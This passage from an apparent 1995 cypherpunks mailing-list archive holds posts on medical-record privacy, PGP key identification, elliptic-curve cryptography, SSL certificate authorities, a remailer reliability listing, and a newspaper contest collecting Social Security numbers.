computer database which will soon contain the files of
all NHS patients in England and Wales, Macara said. "We
will have to ensure the new nationwide computer network
is as secure as humanly possible, and press for a
statutory right to confidentiality of patient
information."

Elizabeth France, the data protection registrar, said the
Criminal Justice Act had recently tightened the law
regarding information obtained by deception. But the
penalties apply only to information held on computer,
rather than medical notes, which at present are held
mainly on hand-written files. "This is something we take
very seriously," France said. "We are actively pursuing
it. It doesn't mean the problems have been solved."

John Wadham, director of Liberty, the civil rights group,
called on the government to introduce a new criminal
offence of obtaining information by deception. "Such
information can obviously include material about sexually
transmitted diseases and material about an individual's
physical and mental health," he said. "There clearly
needs to be a right to privacy so the courts can act
against this."

Baroness Cumberlege, the junior health minister, said
confidentiality remained a cornerstone of the NHS. "We
are about to issue strengthened guidelines for security
of records within hospitals and new measures for
unauthorised access from external sources," she said. "We
are having discussions with the BMA and the Data
Protection Agency specifically about these issues."

-----













From anonymous-remailer at shell.portal.com  Sun Nov 26 20:15:05 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 27 Nov 1995 12:15:05 +0800
Subject: MED_vac
Message-ID: <199511270405.UAA04239@jobe.shell.portal.com>


On Thu, 16 Nov 1995, Adam Shostack wrote:

> 	If you have some personal data that includes your patient
> number, why not have a card that instead lists your important data?
> "This patient is diabetic, alergic to amoxicillin, and has Gold Cross
> insurance." 

I'm confused.  Are you saying that the answer is hardware??  Why I think
someone already thought of that. It's called a MEDIC-ALERT bracelet. 

As someone who's blood type is rare, I can appreciate this.

> 	At Defcon, Bruce Schneier was talking about the value stored
> in casino chips.  Its sttaggering.  Its an alternate cash system, with
> a huge float, astounding velocity, and very little fraud.  Transaction
> costs are low, clearing is instantaneous.  The comparison is fairly
> clear.

I don't see the comparison.

High value "chips" have additional security precautions engineered into
them, over and above low-value chips, hopefully Schneier realizes this.  
There are also regular "counts", in fact perpetual "counts" in all casinos. 

I mean pit bosses and managers have to do something to earn their keep.
(other than handing out comps, I mean.)

There's also an "eye in the sky" lording over you in a casino, and the
"chips" aren't actually "cleared" until you cashout.  I'm not sure how
Schneier got the idea that it was instantaneous clearing, but it isn't by
any stretch of the imagination. 
 
But then what do I know ... I don't even sign my posts with PGP.

> |      So, what if my records were available on the net, but encrypted with a
> | an key known to my physician and an escrow agency? (Equivalently, they
> | could be on that smartcard, but encrypted.) If an emergency occurs, the
> | hospital fetches my encrypted records from my physician's server, then
> | sends a message (signed with the hospital's key) to Keys R Us, the escrow
> | agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
> | key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
> | Inc., insurance card lists my physician's server, the escrow agency, and my

Why bother with having records on the "Net".  What if the net goes down, 
then what??  Where are you left then?  Relying on technology, simply 
because something CAN be done is very bad practice, when its not needed. 

When I travelled in the States, I simply kept a copy of my travel 
documents in my wallet.  I never had any problem.  And I had a copy of my 
pertinent medical data, attached via a MEDIC-ALERT bracelet to my body.

Then again, the amount of information that you want a doctor reading over
when you do have an emergency is minimal.  You really want the doctor to
act, not to get to know all of the details which aren't relevant to your
treatment. 

There's no need to overload someone, you simply have to give someone the
resources they need in order to get the job done. And that is the 
critical point, isn't it??  Getting the job done, and giving someone 
what's needed to do so.

> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From weidai at eskimo.com  Sun Nov 26 21:59:37 1995
From: weidai at eskimo.com (Wei Dai)
Date: Mon, 27 Nov 1995 13:59:37 +0800
Subject: Elliptic curves, current status?
In-Reply-To: <acde968205021004b44c@DialupEudora>
Message-ID: <Pine.SUN.3.91.951126213017.7378B-100000@eskimo.com>


On Sun, 26 Nov 1995, Norman Hardy wrote:

> There are many parameters to an elliptic curve crypto system.
> I haven't seen any taxonomy of which kinds are good and which
> have been shown to be week. In contrast there seems to be a
> consensus about how to pick primes for RSA or Diffie-Hellman.

The IEEE p1363 group's working draft on elliptic curve standard may help 
you here.  You can find it at ftp://ftp.rsa.com/pub/p1363/draft/ec.ps

One reason for confusion about the speed of elliptic curve cryptosystems is 
the small number of implementations.  A paper in Crypto 95 claimed that 
for doing key exchange, an elliptic curve algorithm takes about the same 
time and has about the same level of security as DH with 512 bit modulus, 
and that elliptic curve has a speed advantage if greater security is 
desired.

Wei Dai






From cme at clark.net  Sun Nov 26 22:20:13 1995
From: cme at clark.net (cme at clark.net)
Date: Mon, 27 Nov 1995 14:20:13 +0800
Subject: establishing trust
Message-ID: <199511270516.AAA05126@clark.net>


Greg,

>Subject: Re: establishing trust 
>Date: Mon, 27 Nov 95 12:20:47 +1000
>
>-----BEGIN PGP SIGNED MESSAGE-----

Did you intentionally not provide the same key that this was signed with?
I added the key you provided, but PGP still couldn't find the right key for
this signature.

>  from the same person.  I even know who they came from:  the person who
>  is capable of signing with key 0xXXXXXXXX.
>
>I hate to point this out, but that isn't true.
>Anyone can create a key with any chosen keyid and
>attach the same publicly known name to it.

Of course -- sloppiness on my part -- trying to minimize my own typing.
Pardon me.  One must use a hash of the key or the key itself to identify it
-- not merely some portion of the modulus -- and the ID field has to be
large enough to rule out a brute force search on the spoofer's part.


The PGP KeyID problem has merely to do with PGP's own access mechanisms.
Successful verification of a signature by some key is linkage enough to
that key.  If multiple messages/files verify by the same key, they are
linked together no matter how the key is identified.  The problem you
identified comes from the fact that PGP doesn't let us know with enough
certainty that the same key was used for two different signatures.

In fact, PGP just tells you the UserID of the key which verified the
signature -- as if that UserID were (a) unique and (b) meaningful.  The
keyID isn't displayed.

For a version of PGP to suit my tastes, the unique UserID would be assigned
by me alone -- and the file of those assignments (called "aliases" in
TIS/MOSS) would be protected under my own signature (or, equivalently,
encrypted under my own conventional key -- the same one protecting my
private keys, perhaps).

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme at acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+





From frantz at netcom.com  Sun Nov 26 23:53:45 1995
From: frantz at netcom.com (Bill Frantz)
Date: Mon, 27 Nov 1995 15:53:45 +0800
Subject: Bitbux could eliminate some domestic currencies?
Message-ID: <199511270737.XAA20225@netcom16.netcom.com>


At 12:21 11/23/95 -0800, John Gilmore wrote:
>>From a letter in [My dog, I mean my software, ate this part of the msg -- gnu]
>...
>"The importance of e-money replacing cash is greater than possible effects
>on exchange rates. Rather, it might make certain currencies to all intents
>and purposes disappear."

Gresham's law says that the bad money drives the good money out of
circulation.  Does this mean that real cash is better than ecash ;-).

Bill







From an197098 at anon.penet.fi  Mon Nov 27 01:37:25 1995
From: an197098 at anon.penet.fi (an197098 at anon.penet.fi)
Date: Mon, 27 Nov 1995 17:37:25 +0800
Subject: spooky URL
Message-ID: <9511270916.AA16235@anon.penet.fi>



while visiting  http://www.mcs.com/~candyman/http/boom.html, I noticed that my Netscape's status line mentions an attempt to connect to:

g1.internet-audit.com

a little spooky... any ideas what is happening??


I prefer e-mail. 
reply (anonymously)     to an197098 at anon.penet.fi
reply (NON-anonymously) to na197098 at anon.penet.fi








--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse at anon.penet.fi
For information (incl. non-anon reply) write to    help at anon.penet.fi
If you have any problems, address them to          admin at anon.penet.fi





From carolann at censored.org  Mon Nov 27 02:22:37 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Mon, 27 Nov 1995 18:22:37 +0800
Subject: spooky URL
Message-ID: <199511271012.DAA03786@mailhost1.primenet.com>


Nothing spooky about it.
They are an audit-sevice for web pages that is sponsored.
Anytime you access a page this tell them you were accessed.

Love Always,

Carol Anne
ps. you can get an acct. there if you want it.

>
>while visiting  http://www.mcs.com/~candyman/http/boom.html, I noticed that
my Netscape's status line mentions an attempt to connect to:
>
>g1.internet-audit.com
>
>a little spooky... any ideas what is happening??
>
>
>I prefer e-mail. 
>reply (anonymously)     to an197098 at anon.penet.fi
>reply (NON-anonymously) to na197098 at anon.penet.fi
>
>
>
>
>
>
>
>
>--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
>Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
>Please, report inappropriate use to                abuse at anon.penet.fi
>For information (incl. non-anon reply) write to    help at anon.penet.fi
>If you have any problems, address them to          admin at anon.penet.fi
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From jsw at netscape.com  Mon Nov 27 03:20:22 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Mon, 27 Nov 1995 19:20:22 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <30B99C34.2A1F@netscape.com>


Alex Strasheim wrote:
> 
> > Basicly when the browser finds a new CA that it does know about it promts
> > the user and through a series of dialog boxes the user chooses to trust it
> > or not.
> 
> Is anyone running an ssl web server that would let us see how this works?

  A little bird pointed me toward https://www.secret.org.  I have no
idea who they are...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From anonymous-remailer at shell.portal.com  Mon Nov 27 06:29:17 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 27 Nov 1995 22:29:17 +0800
Subject: Register
Message-ID: <199511271420.GAA26643@jobe.shell.portal.com>


On  8 Mar 95 at 22:46, Robert East wrote:

> Register
> 
> I'd like to sign up for email
> 
> Bob


You got it, Bub!  Er, Bob.










From jya at pipeline.com  Mon Nov 27 06:44:40 1995
From: jya at pipeline.com (John Young)
Date: Mon, 27 Nov 1995 22:44:40 +0800
Subject: ETH_ic?
Message-ID: <199511271435.JAA05550@pipe1.nyc.pipeline.com>


   11-27-95. NYPaper:

   "An Intel computer security expert runs afoul of the law.
   So much for the 'hacker ethic'?"

      Regardless of whether one sees Randal Schwartz as a
      white knight with questionable judgment or a computer
      criminal who deserves jail time, his tale contains
      valuable lessons for anyone who uses or manages a
      corporate computer system. On the Internet, computer
      programmers and systems administrators have debated
      whether Mr. Schwartz was a hero or a criminal. The
      on-line jury is divided. Most concluded that he was
      guilty of poor judgment, not criminal intent. Some say
      the case has killed the hacker ethic. "If I saw someone
      on the Internet with a security weakness, at this point
      I would be reluctant to act the Good Samaritan and
      report it," said Jeffrey Kegler, an independent software
      consultant in Sunnyvale Calif. "If I saw weakness in
      Intel's machine, I'd keep it to myself."

   ETH_ic?  (7 kb)














From raph at CS.Berkeley.EDU  Mon Nov 27 06:59:58 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 27 Nov 1995 22:59:58 +0800
Subject: List of reliable remailers
Message-ID: <199511271450.GAA25350@kiwi.cs.berkeley.edu>


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list at kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail at extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney at shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal at alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere at bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail at c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon at anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer at ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer at utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer at flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer at rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster at remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx at c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer at bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller at c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster at vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo at c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer at replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer at valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer at armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk at remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono at valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer at shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia at chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last update: Mon 27 Nov 95 6:46:42 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hroller  hroller at c2.org                   +*#####---##    46:11  99.99%
robo     robo at c2.org                      +  ####--*##    39:57  99.75%
amnesia  amnesia at chardos.connix.com                 *+    39:12  99.66%
mix      mixmaster at remail.obscura.com     -- ---_.--.   6:36:54  99.37%
hacktic  remailer at utopia.hacktic.nl       +*  **** ***     8:47  98.47%
replay   remailer at replay.com              +*. ***  ***     6:20  98.31%
c2       remail at c2.org                     + ++++- +**  1:12:49  97.94%
ecafe    cpunk at remail.ecafe.org           +* .-- # ###    46:27  97.81%
flame    remailer at flame.alias.net         +*   **  ***    17:41  97.50%
rmadillo remailer at armadillo.com           ++  +++  +++    39:47  97.23%
portal   hfinney at shell.portal.com         +*#*# #  *##      :28  96.79%
spook    remailer at valhalla.phoenix.net     ** ***  ***    28:42  96.76%
alumni   hal at alumni.caltech.edu            +    *  +*      3:02  96.68%
wmono    wmono at valhalla.phoenix.net        *  ***   **    13:11  96.44%
vishnu   mixmaster at vishnu.alias.net         * ***  * *     8:55  95.93%
extropia remail at extropia.wimsey.com       -------  --   5:04:15  95.47%
penet    anon at anon.penet.fi               ----  -- -+   6:23:22  95.06%
ideath   remailer at ideath.goldenbear.com   -- - -_  .-  11:42:46  95.01%
bsu-cs   nowhere at bsu-cs.bsu.edu            *  ##   # #      :29  90.69%
rahul    homer at rahul.net                  +*  +**  +*-    21:04  98.77%
shinobi  remailer at shinobi.alias.net             +  +*+    24:54  85.54%
ford     remailer at bi-node.zerberus.de     *  +++  ++    6:56:02  80.39%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From jya at pipeline.com  Mon Nov 27 07:00:06 1995
From: jya at pipeline.com (John Young)
Date: Mon, 27 Nov 1995 23:00:06 +0800
Subject: EXH_ume
Message-ID: <199511271450.JAA07253@pipe1.nyc.pipeline.com>


   11-27-95. NYPaper, Lead story:

   "U.S. Will Deploy Its Spy Satellites on Nature Mission. A
   Huge Environmental Study Gives a New Lease on Life to
   Intelligence Systems."

      The new program is directing spy satellites to study
      about 500 ecologically sensitive sites around the
      world. The data will be archived for future generations 
of
      scientists and will remain secret for now to conceal the
      abilities of the nation's reconnaissance systems. The
      monitoring effort is led by Medea, an avaricious group of
      about 60 scientists in academia and industry who advise
      the nation's intel clubhouses on the use of secret
      data to "study" the environment. The new reconnaissance
      effort is run for Medea by agony aunt NRO and is
      coordinated by dead-baby CIA.

      The program is very different from the related effort to
      mine old spy-satellite photos for environmental data, a
      wallet-rip the Clinton Administration recently began. So
      too, the program is different from recent intelligence
      gathering that studies natural phenomena for clues to
      ingenious tax milking.

      The Federation of American Scientists said the
      environmental reconnaissance was "potentially a
      watershed in the reform of intelligence," adding, "It
      reflects an expanding teat of national insecurity."

   EXH_ume  (11 kb)













From jk at digit.ee  Mon Nov 27 08:37:11 1995
From: jk at digit.ee (Jyri Kaljundi)
Date: Tue, 28 Nov 1995 00:37:11 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <30B99C34.2A1F@netscape.com>
Message-ID: <Pine.SOL.3.91.951127180832.25120B-100000@sun.digit.ee>


On Mon, 27 Nov 1995, Jeff Weinstein wrote:

> Alex Strasheim wrote:
> > 
> > > Basicly when the browser finds a new CA that it does know about it promts
> > > the user and through a series of dialog boxes the user chooses to trust it
> > > or not.
> > 
> > Is anyone running an ssl web server that would let us see how this works?
> 
>   A little bird pointed me toward https://www.secret.org.  I have no
> idea who they are...

Another way to see the dialog boxes is to delete one of the CA's that 
came with Netscape Navigator and then connect to for example 
https://www.netscape.com/

What software there is available (preferably non-commercial) to become a 
CA? Is for example the SSLeay package enough?


J�ri Kaljundi
jk at digit.ee
Digiturg http://www.digit.ee/






From sameer at c2.org  Mon Nov 27 09:08:16 1995
From: sameer at c2.org (sameer)
Date: Tue, 28 Nov 1995 01:08:16 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <30B99C34.2A1F@netscape.com>
Message-ID: <199511271641.IAA21657@infinity.c2.org>


	You can also snag the apache/ssl webserver and set one up for
yourself, to see what it looks like. Non-commercial use only, as
limited by the RSAREF license.
	The SSL webserver on c2.org is "verisign blessed", so you
can't use it for testing. (Hm, someone should think up a suitably
derisive term of that..)

> 
> Alex Strasheim wrote:
> > 
> > > Basicly when the browser finds a new CA that it does know about it promts
> > > the user and through a series of dialog boxes the user chooses to trust it
> > > or not.
> > 
> > Is anyone running an ssl web server that would let us see how this works?
> 
>   A little bird pointed me toward https://www.secret.org.  I have no
> idea who they are...
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw at netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From alex at proust.suba.com  Mon Nov 27 09:11:16 1995
From: alex at proust.suba.com (Alex Strasheim)
Date: Tue, 28 Nov 1995 01:11:16 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <199511271654.KAA02460@proust.suba.com>


The Chicago Sun-Times is running a contest in which readers are asked to
send in their social security numbers.  Someone will win a cash prize
after a random drawing. 

I can't figure out the angle on this.  If they simply want to run a
promotional contest, why are they asking for ssn's?  If there's an
ulterior motive, what is it?  Are they going to sell the list?  Would they
have a use for it themselves?

The frustrating thing is that there are probably many millions of
Americans who will give away the keys to the store for next to nothing. 

The feds probably made a tactical error:  instead of trying to force
mandatory key escrow down our throats, they ought to have offered everyone
who is willing to submit to voluntary escrow a chance to win a Chrysler
Minivan.

--
Alex Strasheim, alex at proust.suba.com





From norm at netcom.com  Mon Nov 27 09:23:55 1995
From: norm at netcom.com (Norman Hardy)
Date: Tue, 28 Nov 1995 01:23:55 +0800
Subject: Elliptic curves, current status?
Message-ID: <acdf958f00021004c3b1@DialupEudora>


At 9:48 PM 11/26/95, Wei Dai wrote:
....
>The IEEE p1363 group's working draft on elliptic curve standard may help
>you here.  You can find it at ftp://ftp.rsa.com/pub/p1363/draft/ec.ps
>
>One reason for confusion about the speed of elliptic curve cryptosystems is
>the small number of implementations.  A paper in Crypto 95 claimed that
>for doing key exchange, an elliptic curve algorithm takes about the same
>time and has about the same level of security as DH with 512 bit modulus,
>and that elliptic curve has a speed advantage if greater security is
>desired.
>
>Wei Dai

Thanks much! I will look at the paper.







From harmon at tenet.edu  Mon Nov 27 09:27:21 1995
From: harmon at tenet.edu (Dan Harmon)
Date: Tue, 28 Nov 1995 01:27:21 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
In-Reply-To: <199511271654.KAA02460@proust.suba.com>
Message-ID: <Pine.OSF.3.91.951127110933.4219A-100000@beall.tenet.edu>


One reason for the ssn's is that it maybe a LEA sponsered promo. If you a 
dumb enough to have a warrent or other some judgement against you and you 
give your ssn and address to a person or enity that you don't know then 
shame on you.

Dan





From eay at mincom.oz.au  Mon Nov 27 09:39:42 1995
From: eay at mincom.oz.au (Eric Young)
Date: Tue, 28 Nov 1995 01:39:42 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <Pine.SOL.3.91.951127180832.25120B-100000@sun.digit.ee>
Message-ID: <Pine.SOL.3.91.951128030744.19145A-100000@orb>



On Mon, 27 Nov 1995, Jyri Kaljundi wrote:
> What software there is available (preferably non-commercial) to become a 
> CA? Is for example the SSLeay package enough?

I'm just making a quick comment on this point.  The current SSLeay setup, 
I would say no.  You can do it but you need to write more stuff to do it 
correctly.  It is a bit of an evil cludge.

The next version should be able to do this (I hope, depending on time).
The next version has (will have) several different ways to 'retrieve'
certificates which can be added via an run time API (the application can
'push' new methods into the library during startup). I will probably not
have time to put in a 'socket' based certificate server but it should be
simple enough for this to be written by other people. It should also be
simple enough for other people to write some routines that conform to the
API so that the netscape DB files can be accessed by SSLeay (along with
the current SSLeay 'hash directories' and the socket based lookup (if it
gets put in)). 

The most importaint change is that I will support CRL if they are 
present and probably generate an 'warning' if there is no CRL.  I still 
need to write a simple application to do a basic 'keep track of issued 
certificates' and generate a CRL if required.  The library routines to 
write a CA are present, they just need to be glued to a simple database 
(which I will probably do in my demo case via ascii files in directories).

This version will also hopefully support the concept of selecting a 
certificate/private key from a set of certificates, attempting to pick a 
certificate that is in the same 'tree' as another certificate.

This concept of multiple certificates for a person is useful for
SSLtelnet, so that each 'host domain' can issue it's own certificates (and
keep track of it's own CRL).  To let some-one login, just issue them with
a 'certificate' for that 'host domain'. 

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au    | more followups than the message contents :-)






From lharrison at mhv.net  Mon Nov 27 09:51:27 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Tue, 28 Nov 1995 01:51:27 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <9511271738.AA28149@mhv.net>


At 10:54 AM 11/27/95 -0600, Alex Strasheim wrote:
>The Chicago Sun-Times is running a contest in which readers are asked to
>send in their social security numbers.  Someone will win a cash prize
>after a random drawing. 
>
>I can't figure out the angle on this.  If they simply want to run a
>promotional contest, why are they asking for ssn's?  If there's an
>ulterior motive, what is it?  Are they going to sell the list?  Would they
>have a use for it themselves?

Alex -

  There may be *an ulterior motive* of getting the person's ssn, i.e., for
the purpose of the newspaper (and the winner) reporting winnings to IRS.  In
addition, the newspaper may also feel that, in selecting a 10-digit number,
it probably will not repeat such as someone's birthdate.  Personally, I lean
towards the former.
>
>The frustrating thing is that there are probably many millions of
>Americans who will give away the keys to the store for next to nothing. 
>The feds probably made a tactical error:  instead of trying to force
>mandatory key escrow down our throats, they ought to have offered everyone
>who is willing to submit to voluntary escrow a chance to win a Chrysler
>Minivan.

  I agree with you.  I believe *greed* is the operating word....

Regards-
Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison at mhv.net         |      - Go to bed."
*******************************************************






From frantz at netcom.com  Mon Nov 27 10:09:51 1995
From: frantz at netcom.com (Bill Frantz)
Date: Tue, 28 Nov 1995 02:09:51 +0800
Subject: Virus attacks on PGP
Message-ID: <199511270737.XAA20199@netcom16.netcom.com>


At 11:40 11/26/95 -0800, Thomas E Zerucha wrote:
>That woudl be interesting - even with the speaker "off" the power surge 
>causes clicking and other signs.  Not to mention that the interrupt count 
>would start moving (of course the virus could replace the entire OS and 
>would only have to find 300K chunks to hide in).

I looked at the memory usage on my 1meg Mac and 5meg is used for the
system.  I have no idea what it is all being used for.  A lot can hide
there.

Bill Frantz







From samman-ben at CS.YALE.EDU  Mon Nov 27 10:29:09 1995
From: samman-ben at CS.YALE.EDU (Rev. Ben)
Date: Tue, 28 Nov 1995 02:29:09 +0800
Subject: Cypherpunk Certification Authority (fwd)
Message-ID: <Pine.A32.3.91.951127131057.39184B-100000@POWERED.ZOO2.CS.YALE.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 26 Nov 1995, Robert Hettinga wrote:

> >Is this another one of those LD tentacles? ;)
> 
> Must that or a spoof of somekind... "She" didn't sign it, and "she" claims
> to have issued a signature...

Methinks some of us need to read up on undeniable interactive signature 
systems.

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMLn/J75ALmeTVXAJAQGL5QL9HE+t0zKGVni03w4DvV2W1lj1807eaNRp
xD4IJcEUJ+JVk4lUJQ+zNvOf81FMPG+0QNq9tqOEDNqiG9vemD7B8C7et5PH0pFb
ktOeAw5WywsnwSeRleId1ukBktDdZR4v
=QueN
-----END PGP SIGNATURE-----






From SADLER_C at HOSP.STANFORD.EDU  Mon Nov 27 10:46:01 1995
From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler)
Date: Tue, 28 Nov 1995 02:46:01 +0800
Subject: Encrypted Email
Message-ID: <C177ZWAZEVVK8*/R=REN/R=HOSP/U=SADLER_C/@MHS.STANFORD.EDU>


    
    Can anybody briefly summarize for me some options for encrypting email 
    that are secure? I know about PGP but I need something for (my 
    environment) with an easy to use interface (PC-Windows) - for use by 
    people who really aren't very computer literate.
    
    Any ideas?
    
    Thanks!
    
    Connie
    





From weld at l0pht.com  Mon Nov 27 11:32:41 1995
From: weld at l0pht.com (Weld Pond)
Date: Tue, 28 Nov 1995 03:32:41 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <Pine.BSD/.3.91.951127135434.7490A-100000@l0pht.com>


"Lynne L. Harrison" <lharrison at mhv.net>:
>  There may be *an ulterior motive* of getting the person's ssn, i.e., for
>the purpose of the newspaper (and the winner) reporting winnings to IRS.  In
>addition, the newspaper may also feel that, in selecting a 10-digit number,
>it probably will not repeat such as someone's birthdate.  Personally, I lean
>towards the former.

Why not just make giving up your SS# a condition of receiving
the prize *if* you are a winner like lotteries do?  I think the real 
reason is they need a unique number and are lazy and uncreative about 
generating one from the info people send in.

      Weld Pond   -  weld at l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio






From raph at c2.org  Mon Nov 27 11:33:05 1995
From: raph at c2.org (Raph Levien)
Date: Tue, 28 Nov 1995 03:33:05 +0800
Subject: The future will be easy to use
Message-ID: <Pine.SUN.3.91.951127104220.6244B-100000@infinity.c2.org>


Here's a quote from Bill Gates' book:

   The mechanism that will make this possible is based on
   mathematical principles, including what are called
